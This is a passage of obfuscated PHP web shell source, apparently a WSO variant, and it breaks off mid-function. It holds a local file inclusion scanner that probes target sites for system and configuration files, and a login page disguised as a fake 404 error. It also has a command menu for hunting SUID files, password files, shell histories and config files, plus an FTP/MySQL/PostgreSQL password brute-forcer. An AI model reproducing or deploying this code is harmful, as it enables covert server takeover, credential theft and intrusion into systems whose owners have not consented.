"\x2e\56\57\56\56\x2f\x2e\x2e\x2f\56\56\57\x2e\56\x2f\56\x2e\x2f\56\x2e\x2f\56\x2e\57\56\56\x2f\56\56\x2f\56\x2e\57\x2e\56\57\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\145\164\x63\x2f\146\164\160\x68\157\163\164\x73" . $byte1 . ''); $x = 1; if ($type == 1) { $res1 = FetchURL($target . $lfitest); $res2 = FetchURL($target . $lfitest2); $rhash1 = md5($res1); $rhash2 = md5($res2); if ($rhash1 != $rhash2) { print "\x3c\146\157\156\x74\x20\x63\157\154\157\162\x3d\47\147\x72\x65\145\156\x27\x3e\133\x2b\x5d\40\105\170\160\x6c\157\x69\164\x61\142\x6c\x65\41\x3c\57\x66\x6f\x6e\x74\x3e\x20\x3c\x61\x20\150\162\145\x66\x3d\x22" . $target . '' . $lfitest . "\42\76" . $target . '' . $lfitest . "\x3c\x2f\141\76\74\x62\x72\x20\40\57\x3e"; while ($lfiaccess[$x]) { $res3 = FetchURL($target . $lfiaccess[$x]); $rhash3 = md5($res3); if ($rhash3 != $rhash2) { print "\74\x66\x6f\x6e\164\40\x63\157\x6c\x6f\162\75\47\147\162\x65\x65\156\x27\x3e\133\53\x5d\x20\x46\151\x6c\x65\40\144\145\x74\145\143\164\x65\x64\41\x3c\x2f\x66\x6f\156\x74\x3e\40\x3c\141\x20\150\x72\x65\x66\x3d\42" . $target . '' . $lfiaccess[$x] . "\42\x3e" . $target . '' . $lfiaccess[$x] . "\x3c\57\141\x3e\74\x62\162\40\40\x2f\x3e"; } else { print "\x3c\146\x6f\156\x74\x20\x63\157\154\x6f\162\x3d\x27\x72\x65\x64\x27\76\133\41\135\x20\106\x61\x69\154\145\144\41\x3c\x2f\x66\157\156\164\x3e" . $target . '' . $lfiaccess[$x] . "\74\x62\162\x20\40\x2f\76"; } $x++; } } } if ($type == 2) { $res1 = FetchURL($target . $lfitest); $res2 = FetchURL($target . $lfitest2); $rhash1 = md5($res1); $rhash2 = md5($res2); if ($rhash1 != $rhash2) { print "\74\146\x6f\156\164\40\143\157\x6c\157\x72\75\x27\147\162\145\x65\x6e\47\76\x5b\53\135\x20\x45\x78\x70\x6c\157\151\164\141\x62\154\145\41\x3c\57\x66\157\x6e\164\76\40\x3c\x61\x20\150\x72\145\x66\75\42" . $target . '' . $lfitest . "\42\x3e" . $target . '' . $lfitest . "\74\57\141\x3e\74\x62\x72\40\x20\x2f\x3e"; while ($lficonfig[$x]) { $res3 = FetchURL($target . $lficonfig[$x]); $rhash3 = md5($res3); if ($rhash3 != $rhash2) { print "\x3c\x66\157\156\x74\40\x63\x6f\154\x6f\x72\x3d\47\147\162\145\x65\x6e\x27\76\x5b\53\x5d\x20\106\151\x6c\x65\x20\x64\145\164\x65\x63\164\145\x64\41\x3c\57\x66\157\x6e\x74\76\40\74\141\40\x68\162\145\146\x3d\x22" . $target . '' . $lficonfig[$x] . "\42\x3e" . $target . '' . $lficonfig[$x] . "\x3c\57\x61\76\x3c\142\162\x20\x20\57\x3e"; } else { print "\x3c\x66\157\x6e\x74\x20\x63\157\154\x6f\162\75\x27\162\145\144\x27\76\133\41\x5d\x20\106\x61\x69\154\145\x64\41\x3c\57\x66\x6f\156\164\x3e" . $target . '' . $lficonfig[$x] . "\74\x62\162\x20\40\x2f\x3e"; } $x++; } } } if ($type == 3) { $res1 = FetchURL($target . $lfitest); $res2 = FetchURL($target . $lfitest2); $rhash1 = md5($res1); $rhash2 = md5($res2); if ($rhash1 != $rhash2) { print "\74\146\157\156\164\40\143\x6f\154\x6f\x72\75\47\x67\x72\145\x65\156\x27\76\x5b\x2b\135\x20\x45\x78\x70\154\157\x69\x74\x61\142\x6c\x65\x21\74\x2f\146\157\156\x74\x3e\x20\74\x61\40\150\x72\145\146\75\x22" . $target . '' . $lfitest . "\42\x3e" . $target . '' . $lfitest . "\74\x2f\141\x3e\74\x62\162\40\x20\57\76"; while ($lfierror[$x]) { $res3 = FetchURL($target . $lfierror[$x]); $rhash3 = md5($res3); if ($rhash3 != $rhash2) { print "\74\x66\x6f\156\x74\40\x63\x6f\x6c\x6f\162\x3d\x27\147\x72\x65\x65\x6e\47\76\x5b\53\x5d\40\106\151\154\145\x20\144\145\164\145\143\x74\145\144\41\x3c\57\146\x6f\156\x74\76\x20\74\141\40\150\162\x65\146\x3d\x22" . $target . '' . $lfierror[$x] . "\x22\x3e" . $target . '' . $lfierror[$x] . "\x3c\x2f\x61\x3e\74\x62\x72\40\x20\x2f\x3e"; } else { print "\x3c\x66\x6f\x6e\x74\40\143\157\x6c\x6f\x72\x3d\47\162\x65\x64\x27\x3e\133\x21\x5d\x20\106\141\x69\x6c\x65\144\x21\x3c\57\x66\x6f\x6e\x74\76" . $target . '' . $lfierror[$x] . "\x3c\x62\162\40\x20\x2f\76"; } $x++; } } } if ($type == 4) { $res1 = FetchURL($target . $lfitest); $res2 = FetchURL($target . $lfitest2); $rhash1 = md5($res1); $rhash2 = md5($res2); if ($rhash1 != $rhash2) { print "\74\x66\157\156\x74\40\x63\x6f\x6c\157\162\75\47\x67\x72\145\145\156\47\76\x5b\53\135\40\105\x78\160\154\x6f\151\164\141\142\154\x65\x21\x3c\x2f\146\157\x6e\164\x3e\x20\x3c\x61\40\x68\162\x65\x66\75\x22" . $target . '' . $lfitest . "\42\x3e" . $target . '' . $lfitest . "\74\57\x61\76\x3c\142\x72\x20\x20\57\x3e"; while ($lfiphpini[$x]) { $res3 = FetchURL($target . $lfiphpini[$x]); $rhash3 = md5($res3); if ($rhash3 != $rhash2) { print "\x3c\146\157\x6e\x74\40\x63\157\x6c\157\162\x3d\47\147\162\x65\145\x6e\47\x3e\x5b\53\135\40\x46\x69\x6c\x65\x20\144\x65\164\145\143\x74\x65\144\41\74\57\x66\x6f\x6e\x74\76\x20\x3c\141\x20\x68\162\x65\x66\75\42" . $target . '' . $lfiphpini[$x] . "\42\76" . $target . '' . $lfiphpini[$x] . "\x3c\57\x61\x3e\x3c\142\x72\x20\x20\x2f\x3e"; } else { print "\x3c\x66\157\156\164\x20\x63\157\x6c\x6f\x72\x3d\47\x72\145\x64\x27\76\133\x21\135\40\x46\141\151\154\x65\x64\x21\74\x2f\x66\157\x6e\x74\76" . $target . '' . $lfiphpini[$x] . "\x3c\142\x72\x20\x20\57\x3e"; } $x++; } } } if ($type == 5) { $res1 = FetchURL($target . $lfitest); $res2 = FetchURL($target . $lfitest2); $rhash1 = md5($res1); $rhash2 = md5($res2); if ($rhash1 != $rhash2) { print "\74\x66\157\156\x74\40\x63\157\154\x6f\162\x3d\47\x67\162\145\x65\x6e\47\x3e\133\53\x5d\x20\x45\170\160\154\x6f\151\x74\141\x62\x6c\x65\x21\x3c\x2f\x66\x6f\156\x74\76\x20\x3c\x61\40\150\x72\x65\146\x3d\x22" . $target . '' . $lfitest . "\x22\x3e" . $target . '' . $lfitest . "\74\57\141\76\74\x62\x72\x20\40\57\x3e"; while ($lfimysql[$x]) { $res3 = FetchURL($target . $lfimysql[$x]); $rhash3 = md5($res3); if ($rhash3 != $rhash2) { print "\74\x66\157\156\164\x20\143\x6f\154\157\162\75\47\147\x72\145\x65\x6e\47\76\133\x2b\135\40\106\x69\x6c\x65\40\144\145\164\x65\x63\164\145\144\x21\x3c\x2f\146\x6f\x6e\x74\76\40\74\141\40\150\x72\x65\146\x3d\x22" . $target . '' . $lfimysql[$x] . "\42\76" . $target . '' . $lfimysql[$x] . "\x3c\57\141\76\x3c\142\162\40\x20\x2f\x3e"; } else { print "\74\x66\x6f\156\164\x20\x63\x6f\154\157\162\x3d\47\162\x65\x64\47\x3e\x5b\41\x5d\40\x46\141\151\154\x65\x64\x21\74\x2f\146\x6f\x6e\x74\x3e" . $target . '' . $lfimysql[$x] . "\74\142\x72\x20\x20\57\x3e"; } $x++; } } } if ($type == 6) { $res1 = FetchURL($target . $lfitest); $res2 = FetchURL($target . $lfitest2); $rhash1 = md5($res1); $rhash2 = md5($res2); if ($rhash1 != $rhash2) { print "\x3c\146\157\156\164\40\143\x6f\x6c\157\x72\75\x27\147\x72\x65\145\156\x27\76\133\53\135\x20\105\170\160\154\157\151\x74\141\x62\154\x65\41\74\57\146\157\156\x74\x3e\x20\74\141\x20\x68\162\x65\x66\75\x22" . $target . '' . $lfitest . "\42\76" . $target . '' . $lfitest . "\74\x2f\x61\x3e\x3c\x62\x72\x20\40\x2f\x3e"; while ($lfiftp[$x]) { $res3 = FetchURL($target . $lfiftp[$x]); $rhash3 = md5($res3); if ($rhash3 != $rhash2) { print "\74\x66\x6f\x6e\x74\40\x63\157\x6c\157\x72\x3d\x27\147\162\145\145\x6e\47\x3e\x5b\53\x5d\x20\106\151\x6c\x65\x20\144\x65\164\145\143\x74\x65\x64\41\74\x2f\x66\x6f\x6e\x74\76\x20\x3c\x61\40\150\162\x65\146\75\42" . $target . '' . $lfiftp[$x] . "\x22\x3e" . $target . '' . $lfiftp[$x] . "\74\x2f\141\76\74\x62\x72\x20\40\57\x3e"; } else { print "\74\x66\157\x6e\164\40\143\x6f\154\x6f\162\x3d\47\162\x65\x64\x27\76\x5b\x21\135\x20\106\x61\151\154\145\x64\x21\x3c\x2f\146\x6f\156\x74\x3e" . $target . '' . $lfiftp[$x] . "\74\142\162\40\x20\57\76"; } $x++; } } } if ($type == 7) { $res1 = FetchURL($target . $lfitest); $res2 = FetchURL($target . $lfitest2); $rhash1 = md5($res1); $rhash2 = md5($res2); if ($rhash1 != $rhash2) { print "\x3c\146\157\x6e\x74\x20\143\157\x6c\157\x72\x3d\47\147\162\145\x65\x6e\x27\76\x5b\x2b\x5d\x20\105\x78\160\154\x6f\151\x74\141\x62\154\x65\x21\x3c\57\146\x6f\x6e\164\x3e\x20\x3c\x61\40\150\x72\x65\146\x3d\42" . $target . '' . $lfitest . "\x22\76" . $target . '' . $lfitest . "\x3c\57\x61\x3e\74\x62\162\x20\40\57\76"; $res3 = FetchURL($target . $lfiprocenv); $rhash3 = md5($res3); if ($rhash3 != $rhash2) { print "\74\x66\x6f\x6e\164\x20\143\157\x6c\x6f\162\x3d\47\147\x72\145\x65\156\x27\76\x5b\53\135\x20\x46\x69\x6c\145\x20\144\x65\x74\145\143\164\145\x64\x21\74\x2f\x66\157\x6e\x74\x3e\x20\74\x61\x20\x68\x72\145\x66\x3d\42" . $target . '' . $lfiprocenv . "\x22\76" . $target . '' . $lfiprocenv . "\x3c\x2f\141\76\74\142\162\x20\x20\x2f\76"; } else { print "\74\x66\x6f\156\164\x20\x63\x6f\x6c\x6f\162\75\x27\162\x65\144\x27\76\133\x21\x5d\x20\106\141\x69\154\145\x64\41\x3c\x2f\146\x6f\156\164\x3e" . $target . '' . $lfiprocenv . "\74\142\162\40\40\57\76"; } } } } wsoFooter(); } goto Ejazf; FF3fF: $safe_mode = @ini_get("\x73\141\146\145\x5f\155\x6f\144\x65"); goto E2gkR; X2GR2: if ($_POST["\161\165\145\162\x79"]) { $veriyfy = stripslashes(stripslashes($_POST["\x71\x75\145\162\171"])); $data = "\144\x61\x74\x61\56\x74\x78\164"; @touch("\x64\x61\x74\x61\56\x74\170\x74"); $ver = @fopen($data, "\x77"); @fwrite($ver, $veriyfy); @fclose($ver); } else { $datas = @fopen("\x64\141\x74\141\x2e\x74\x78\164", "\162"); $i = 0; while ($i <= 5) { $i++; $blue = @fgets($datas, 1024); echo $blue; } } goto uKoLR; v_sDF: function wsoLogin() { die("\x3c\150\61\76\116\157\164\40\106\x6f\x75\156\144\74\x2f\x68\x31\76\xa\74\160\x3e\124\x68\x65\x20\162\145\161\165\145\x73\164\x65\144\x20\125\122\x4c\40\x77\141\163\40\x6e\157\x74\40\x66\x6f\165\x6e\144\40\157\156\x20\x74\x68\x69\x73\40\x73\x65\162\166\145\x72\x2e\x3c\57\160\x3e\12\74\x70\x3e\x41\144\x64\x69\x74\151\x6f\156\x61\x6c\x6c\x79\54\x20\141\40\x34\x30\64\40\x4e\157\164\x20\106\157\x75\156\144\x20\x65\x72\x72\x6f\x72\40\167\x61\163\x20\x65\156\143\157\x75\156\x74\x65\x72\145\144\x20\x77\150\x69\x6c\145\x20\164\x72\171\x69\156\147\x20\x74\157\40\x75\x73\x65\x20\x61\x6e\x20\105\x72\x72\x6f\162\104\157\143\165\155\x65\x6e\x74\x20\164\x6f\x20\x68\141\x6e\x64\154\145\40\x74\150\145\40\162\x65\x71\x75\145\163\164\56\74\57\160\x3e\xa\74\150\162\x3e\xa\x3c\141\x64\144\162\x65\x73\x73\76\101\160\141\143\150\145\57\x32\x2e\x32\x2e\x32\62\x20\x28\125\156\x69\x78\51\x20\x6d\x6f\x64\x5f\163\163\x6c\x2f\x32\x2e\62\56\62\62\40\x4f\x70\145\156\x53\x53\114\x2f\x31\56\x30\x2e\x30\55\x66\151\x70\x73\x20\x6d\157\144\137\141\165\x74\x68\137\160\141\163\163\x74\x68\x72\157\165\147\150\57\x32\56\61\x20\x6d\157\144\x5f\x62\167\x6c\151\x6d\151\x74\145\144\57\x31\56\x34\40\x46\162\157\x6e\164\x50\x61\x67\x65\57\x35\x2e\60\x2e\x32\x2e\62\x36\x33\65\x20\123\x65\162\x76\145\162\x20\x61\x74\40\120\157\x72\164\40\x38\x30\x3c\57\x61\x64\144\162\145\163\x73\76\12\x20\40\40\40\x3c\x73\x74\171\x6c\x65\76\xa\x20\40\x20\40\40\x20\x20\40\151\x6e\x70\165\x74\40\x7b\x20\155\x61\162\x67\151\x6e\72\60\73\142\141\143\153\x67\x72\157\165\x6e\144\55\x63\x6f\154\x6f\x72\x3a\43\x66\x66\x66\x3b\142\x6f\x72\x64\145\x72\x3a\61\160\170\40\x73\157\154\x69\144\40\43\x66\146\x66\73\x20\175\xa\40\40\40\40\x3c\x2f\163\164\x79\154\145\x3e\12\x20\x20\x20\40\x3c\x70\x72\x65\x20\x61\x6c\x69\147\x6e\x3d\x63\x65\156\164\145\x72\x3e\xa\40\x20\40\x20\x3c\x66\x6f\x72\x6d\x20\155\x65\164\x68\157\x64\75\160\x6f\163\164\76\12\x20\x20\40\x20\x3c\x69\x6e\x70\165\x74\x20\x74\x79\x70\145\x3d\160\141\x73\x73\167\x6f\x72\144\40\x6e\141\x6d\x65\x3d\x70\x61\163\163\x3e\xa\40\40\x20\40\x3c\57\x66\x6f\x72\155\x3e\74\57\160\x72\145\76"); } goto ktSrM; UbTi2: @ini_set("\x6d\141\x78\137\x65\170\145\x63\x75\164\x69\x6f\156\x5f\x74\x69\x6d\145", 0); goto KTxg3; E2gkR: if (!$safe_mode) { error_reporting(0); } goto B4ijc; dbSML: if ($os == "\167\x69\156") { $aliases = array("\x4c\151\x73\164\40\104\x69\x72\x65\143\164\x6f\x72\x79" => "\x64\x69\x72", "\x46\151\x6e\144\40\x69\156\x64\x65\170\56\160\x68\x70\x20\151\156\x20\x63\x75\x72\162\x65\156\164\x20\x64\151\162" => "\x64\x69\162\40\57\x73\40\x2f\x77\40\x2f\x62\x20\151\x6e\x64\x65\x78\56\x70\150\x70", "\x46\151\x6e\x64\x20\52\143\x6f\x6e\146\x69\147\x2a\x2e\160\x68\x70\40\x69\x6e\x20\x63\x75\x72\162\x65\x6e\x74\40\144\x69\162" => "\144\151\162\40\x2f\163\x20\57\167\x20\x2f\142\x20\52\x63\x6f\156\x66\x69\147\52\56\x70\x68\160", "\123\150\157\x77\x20\141\x63\164\x69\x76\x65\x20\x63\x6f\x6e\156\x65\x63\164\151\x6f\156\163" => "\x6e\x65\164\163\x74\141\x74\x20\55\x61\x6e", "\123\150\x6f\167\40\x72\165\x6e\x6e\151\156\147\40\x73\x65\x72\166\x69\x63\145\163" => "\156\145\164\x20\x73\x74\x61\162\164", "\x55\x73\145\x72\40\x61\x63\x63\157\x75\156\164\163" => "\156\145\164\x20\x75\163\x65\162", "\123\x68\157\x77\x20\x63\157\155\x70\165\164\x65\162\163" => "\156\x65\164\40\x76\x69\x65\167", "\x41\x52\x50\x20\124\141\x62\x6c\145" => "\x61\x72\160\40\55\x61", "\x49\120\x20\x43\x6f\x6e\x66\151\147\165\x72\141\x74\151\x6f\x6e" => "\x69\160\143\157\x6e\x66\x69\147\x20\57\x61\154\x6c"); } else { $aliases = array("\114\151\163\164\x20\144\151\x72" => "\154\x73\40\55\x6c\x68\141", "\154\x69\163\x74\40\146\151\154\145\40\x61\x74\x74\162\x69\142\165\164\x65\x73\40\x6f\156\40\x61\x20\114\151\x6e\x75\170\40\163\145\x63\x6f\x6e\144\40\145\x78\x74\x65\156\x64\145\x64\x20\146\151\x6c\x65\x20\163\171\x73\x74\x65\x6d" => "\x6c\163\x61\x74\164\162\x20\55\166\x61", "\163\x68\157\x77\40\x6f\x70\145\156\145\x64\x20\x70\x6f\x72\x74\x73" => "\156\145\164\x73\x74\141\164\40\x2d\x61\x6e\x20\x7c\x20\x67\162\x65\x70\x20\x2d\151\40\x6c\151\163\164\145\x6e", "\x70\162\157\x63\x65\163\x73\40\x73\164\x61\x74\x75\163" => "\x70\163\x20\141\x75\x78", "\x46\151\x6e\144" => '', "\146\x69\156\144\40\x61\x6c\154\40\x73\165\x69\144\x20\146\x69\x6c\x65\163" => "\x66\x69\156\x64\40\x2f\x20\55\x74\171\160\x65\40\x66\40\55\x70\145\x72\x6d\x20\55\60\x34\60\x30\x30\x20\55\154\163", "\x66\x69\x6e\144\x20\163\x75\x69\x64\x20\146\x69\154\145\x73\40\x69\x6e\40\143\x75\x72\162\145\x6e\164\40\x64\151\162" => "\x66\151\156\144\x20\x2e\40\55\164\x79\160\x65\40\146\x20\55\160\x65\x72\x6d\40\55\60\x34\60\x30\x30\x20\x2d\x6c\x73", "\146\151\156\x64\40\141\x6c\154\40\163\147\151\144\40\146\x69\x6c\x65\163" => "\x66\x69\x6e\144\x20\57\x20\55\x74\x79\x70\x65\x20\146\x20\55\x70\145\162\155\40\55\60\x32\x30\60\x30\x20\x2d\x6c\163", "\x66\x69\x6e\x64\x20\x73\x67\x69\144\x20\146\x69\x6c\145\x73\x20\x69\156\40\143\x75\x72\x72\x65\x6e\x74\x20\144\151\x72" => "\x66\x69\156\144\40\x2e\x20\55\164\x79\160\x65\x20\x66\x20\x2d\160\x65\x72\x6d\40\x2d\60\62\x30\60\x30\40\55\154\x73", "\146\x69\x6e\x64\40\143\x6f\156\x66\151\147\x2e\x69\x6e\x63\x2e\x70\x68\x70\x20\x66\151\154\x65\163" => "\146\x69\156\144\40\x2f\x20\55\x74\171\160\x65\40\x66\x20\55\156\x61\155\145\40\143\157\156\x66\151\147\56\151\156\x63\56\160\x68\x70", "\146\x69\156\x64\x20\x63\157\x6e\x66\151\x67\52\40\x66\x69\154\145\x73" => "\x66\151\x6e\144\x20\x2f\40\55\x74\171\x70\145\40\146\40\55\x6e\x61\x6d\x65\x20\42\x63\x6f\156\x66\x69\x67\52\x22", "\x66\x69\x6e\144\x20\x63\157\x6e\x66\x69\x67\x2a\x20\x66\x69\154\x65\x73\40\151\x6e\x20\x63\165\162\x72\x65\156\x74\x20\x64\x69\x72" => "\146\x69\156\x64\40\56\40\x2d\x74\x79\160\145\40\146\40\55\x6e\141\155\145\40\42\x63\157\156\146\x69\x67\52\42", "\146\151\156\144\40\141\154\x6c\x20\167\x72\x69\x74\141\x62\x6c\145\x20\146\157\x6c\x64\145\x72\163\x20\141\156\x64\40\x66\151\x6c\x65\x73" => "\x66\151\x6e\144\x20\x2f\x20\55\x70\145\162\155\40\55\62\x20\55\x6c\163", "\x66\151\x6e\144\x20\x61\154\154\x20\x77\x72\151\164\141\x62\154\x65\40\x66\x6f\154\144\145\162\x73\x20\x61\x6e\x64\40\146\x69\x6c\145\x73\40\x69\156\x20\x63\165\162\162\x65\156\x74\x20\x64\x69\x72" => "\x66\x69\x6e\144\x20\x2e\x20\55\160\145\x72\x6d\40\x2d\x32\40\55\154\x73", "\146\151\156\x64\x20\x61\x6c\154\40\x73\x65\162\x76\x69\x63\x65\x2e\160\167\x64\x20\146\151\x6c\145\163" => "\146\151\x6e\x64\x20\x2f\40\x2d\x74\171\160\x65\40\146\40\55\x6e\x61\x6d\x65\40\163\145\162\166\x69\143\145\56\x70\x77\144", "\x66\x69\x6e\x64\x20\163\145\x72\x76\151\143\145\x2e\160\x77\144\x20\146\x69\x6c\x65\163\40\151\156\x20\143\165\162\x72\x65\x6e\164\40\x64\151\x72" => "\146\151\x6e\144\40\x2e\x20\x2d\x74\x79\x70\145\40\146\40\x2d\156\141\x6d\145\40\x73\145\x72\166\151\143\145\56\x70\167\x64", "\146\x69\x6e\x64\x20\x61\154\154\40\x2e\x68\164\160\x61\163\x73\x77\144\x20\x66\x69\154\x65\163" => "\146\x69\156\144\x20\57\x20\55\x74\171\x70\145\x20\146\x20\55\x6e\141\155\145\x20\56\150\164\160\x61\x73\x73\x77\x64", "\x66\x69\x6e\x64\x20\x2e\150\164\x70\141\163\163\167\144\x20\146\151\x6c\x65\163\x20\x69\x6e\x20\143\x75\162\162\145\156\164\40\x64\151\x72" => "\x66\151\156\144\x20\56\40\55\x74\x79\x70\x65\40\146\40\55\156\x61\x6d\x65\40\x2e\150\x74\x70\141\163\x73\167\x64", "\146\151\x6e\144\x20\x61\x6c\154\40\x2e\x62\141\x73\150\x5f\x68\x69\x73\164\x6f\162\x79\40\146\x69\154\x65\163" => "\x66\x69\156\144\x20\x2f\x20\x2d\164\x79\x70\145\40\146\40\x2d\156\x61\155\145\x20\x2e\x62\x61\x73\x68\137\150\151\x73\164\157\162\x79", "\146\x69\x6e\144\40\x2e\142\x61\x73\150\x5f\150\x69\163\164\157\162\171\x20\x66\x69\x6c\145\163\x20\151\156\40\x63\165\162\x72\145\156\164\x20\x64\x69\162" => "\x66\x69\x6e\144\40\x2e\40\x2d\x74\171\160\145\x20\x66\x20\x2d\x6e\x61\155\145\40\x2e\x62\141\x73\150\137\150\x69\163\164\157\162\171", "\x66\x69\x6e\x64\40\x61\x6c\x6c\40\56\x66\145\164\x63\150\x6d\x61\x69\154\162\x63\x20\x66\x69\x6c\x65\163" => "\146\x69\156\x64\x20\57\40\55\x74\x79\x70\145\40\x66\40\55\x6e\141\155\x65\40\x2e\146\x65\x74\x63\150\x6d\141\151\x6c\162\143", "\146\151\156\x64\40\x2e\x66\x65\x74\143\x68\155\141\151\154\x72\x63\40\146\151\x6c\145\163\x20\x69\x6e\40\x63\165\162\162\145\156\x74\40\144\x69\x72" => "\x66\151\x6e\x64\x20\x2e\x20\x2d\164\x79\160\x65\x20\146\x20\55\x6e\141\155\x65\x20\x2e\146\x65\x74\x63\x68\x6d\141\151\154\162\143", "\114\x6f\x63\x61\164\x65" => '', "\x6c\x6f\143\141\x74\x65\40\x68\x74\164\160\x64\56\143\157\x6e\146\x20\146\151\154\x65\163" => "\x6c\x6f\143\141\164\x65\40\x68\x74\164\160\x64\56\143\157\156\x66", "\154\157\143\x61\164\x65\x20\166\150\157\163\164\163\56\x63\157\156\x66\40\x66\x69\x6c\145\x73" => "\154\157\x63\x61\x74\x65\40\166\x68\x6f\x73\x74\x73\56\x63\x6f\x6e\146", "\x6c\x6f\143\141\164\x65\40\x70\162\157\146\164\x70\x64\x2e\x63\x6f\x6e\146\x20\x66\x69\x6c\145\163" => "\x6c\x6f\143\141\164\145\x20\160\162\x6f\x66\x74\160\x64\x2e\143\x6f\x6e\x66", "\x6c\x6f\143\x61\x74\145\x20\160\x73\x79\142\156\143\x2e\143\157\x6e\x66\x20\x66\x69\x6c\x65\163" => "\x6c\x6f\143\x61\164\x65\x20\160\163\171\x62\x6e\143\56\x63\x6f\156\x66", "\x6c\157\x63\x61\x74\x65\40\x6d\x79\x2e\x63\x6f\156\146\x20\x66\151\x6c\145\x73" => "\154\x6f\x63\x61\x74\x65\40\155\171\x2e\143\x6f\x6e\x66", "\154\157\143\141\164\x65\x20\141\x64\x6d\x69\156\56\160\150\160\x20\146\x69\x6c\145\163" => "\x6c\x6f\143\141\164\x65\40\141\144\x6d\x69\x6e\56\x70\x68\160", "\x6c\x6f\x63\x61\x74\x65\40\x63\x66\x67\56\160\150\160\x20\x66\x69\154\145\163" => "\154\x6f\143\141\164\x65\x20\x63\146\x67\x2e\160\150\160", "\154\157\143\x61\164\145\40\143\157\156\146\56\160\150\x70\x20\146\x69\x6c\x65\x73" => "\154\x6f\143\x61\x74\145\x20\143\x6f\156\146\x2e\160\150\160", "\x6c\x6f\143\141\x74\145\40\x63\x6f\156\x66\x69\147\x2e\144\x61\164\40\x66\151\154\x65\x73" => "\154\x6f\x63\x61\x74\145\40\x63\157\156\146\x69\147\x2e\x64\141\x74", "\154\x6f\x63\141\164\x65\x20\143\157\156\146\x69\x67\56\160\150\160\40\x66\151\154\145\x73" => "\154\157\x63\141\x74\x65\40\143\157\x6e\146\151\147\56\160\x68\160", "\154\157\x63\141\x74\x65\x20\x63\x6f\x6e\x66\x69\147\x2e\151\156\x63\40\x66\151\x6c\145\163" => "\x6c\157\143\141\164\145\40\143\x6f\156\146\x69\x67\x2e\x69\x6e\x63", "\154\x6f\143\x61\x74\x65\40\x63\157\x6e\x66\151\x67\x2e\x69\156\x63\x2e\x70\150\160" => "\x6c\157\143\141\x74\x65\x20\x63\157\x6e\146\x69\147\56\151\x6e\143\56\160\x68\x70", "\x6c\157\x63\141\164\145\x20\143\x6f\x6e\146\x69\x67\56\144\x65\146\x61\165\154\x74\56\x70\x68\160\40\x66\151\154\x65\163" => "\x6c\157\143\141\164\x65\x20\x63\157\156\x66\x69\x67\x2e\x64\145\x66\x61\x75\154\164\x2e\x70\x68\160", "\154\157\x63\x61\x74\145\40\x63\157\156\x66\151\147\52\40\x66\151\154\145\x73\40" => "\x6c\x6f\x63\x61\164\145\x20\143\x6f\x6e\x66\x69\147", "\154\157\x63\141\164\145\x20\x2e\143\x6f\x6e\146\40\x66\x69\x6c\145\163" => "\154\x6f\143\141\164\x65\40\x27\x2e\x63\x6f\156\146\47", "\154\157\x63\141\164\x65\x20\x2e\x70\167\144\x20\146\151\x6c\x65\163" => "\x6c\157\143\x61\x74\x65\x20\x27\x2e\x70\167\x64\x27", "\x6c\157\143\x61\x74\x65\x20\56\163\x71\154\40\x66\x69\154\145\x73" => "\x6c\157\x63\141\x74\145\x20\47\56\x73\161\154\47", "\x6c\157\143\141\x74\145\x20\x2e\150\x74\x70\x61\x73\163\167\x64\x20\146\x69\x6c\145\x73" => "\x6c\x6f\143\x61\x74\145\x20\47\x2e\x68\x74\160\x61\163\163\167\x64\x27", "\154\157\143\x61\164\145\40\x2e\142\x61\x73\150\x5f\150\x69\163\x74\x6f\162\x79\40\x66\x69\x6c\145\x73" => "\154\157\x63\141\164\145\40\x27\x2e\142\x61\x73\150\137\x68\151\x73\164\157\162\x79\47", "\x6c\x6f\143\x61\164\145\40\56\155\171\x73\x71\x6c\x5f\150\151\x73\164\x6f\162\x79\x20\146\x69\154\145\x73" => "\154\x6f\x63\141\164\x65\40\47\x2e\155\171\x73\x71\154\x5f\150\x69\163\164\157\x72\171\x27", "\x6c\157\x63\141\x74\145\x20\56\146\x65\164\143\150\x6d\141\x69\x6c\162\143\40\x66\151\x6c\145\163" => "\154\x6f\x63\141\164\x65\x20\x27\56\x66\145\164\x63\150\x6d\x61\151\154\162\x63\47", "\154\x6f\143\x61\x74\x65\x20\142\x61\143\153\165\x70\x20\146\151\154\x65\x73" => "\x6c\x6f\143\x61\164\145\x20\142\141\143\153\165\160", "\154\x6f\143\141\164\x65\40\144\x75\x6d\160\x20\x66\151\154\145\x73" => "\x6c\x6f\x63\x61\164\x65\40\x64\x75\155\160", "\154\157\143\141\x74\x65\x20\160\x72\151\166\40\146\x69\154\x65\x73" => "\154\x6f\143\141\x74\x65\x20\160\162\151\166"); } goto kwWV5; B4ijc: $disable_functions = @ini_get("\144\151\163\x61\x62\x6c\x65\x5f\x66\x75\156\143\x74\151\157\x6e\x73"); goto QwM1y; KTxg3: @set_time_limit(0); goto HrH07; SKJBT: if (!function_exists("\160\x6f\163\x69\170\x5f\x67\x65\x74\x67\162\147\x69\144") && strpos($GLOBALS["\144\151\163\141\142\154\x65\137\x66\x75\x6e\143\164\x69\x6f\x6e\x73"], "\x70\157\163\151\x78\137\x67\x65\x74\x67\162\x67\x69\x64") === false) { function posix_getgrgid($p) { return false; } } goto lpEk_; iAJkS: $time_shell = '' . date("\144\x2f\155\x2f\x59\x20\x2d\40\110\72\x69\x3a\x73") . ''; goto Yc43E; cwENR: function actionBruteforce() { wsoHeader(); if (isset($_POST["\160\162\157\164\157"])) { echo "\x3c\x68\61\x3e\x52\x65\x73\165\x6c\x74\x73\74\x2f\150\x31\76\74\x64\151\x76\40\143\x6c\x61\163\x73\75\143\x6f\x6e\164\x65\x6e\x74\76\74\163\160\141\156\76\124\171\x70\x65\x3a\x3c\x2f\x73\160\x61\156\76\40" . htmlspecialchars($_POST["\160\162\x6f\164\157"]) . "\x20\74\x73\x70\141\156\76\x53\x65\x72\x76\145\x72\72\x3c\x2f\163\x70\141\156\x3e\x20" . htmlspecialchars($_POST["\163\145\162\166\x65\x72"]) . "\x3c\142\x72\x3e"; if ($_POST["\x70\162\x6f\164\x6f"] == "\146\x74\x70") { function bruteForce($ip, $port, $login, $pass) { $fp = @ftp_connect($ip, $port ? $port : 21); if (!$fp) { return false; } $res = @ftp_login($fp, $login, $pass); @ftp_close($fp); return $res; } } elseif ($_POST["\x70\162\157\164\x6f"] == "\x6d\x79\x73\x71\154") { function bruteForce($ip, $port, $login, $pass) { $res = @mysql_connect($ip . "\72" . $port ? $port : 3306, $login, $pass); @mysql_close($res); return $res; } } elseif ($_POST["\160\x72\157\x74\x6f"] == "\x70\x67\163\161\x6c") { function bruteForce($ip, $port, $login, $pass) { $str = "\x68\157\163\164\x3d\x27" . $ip . 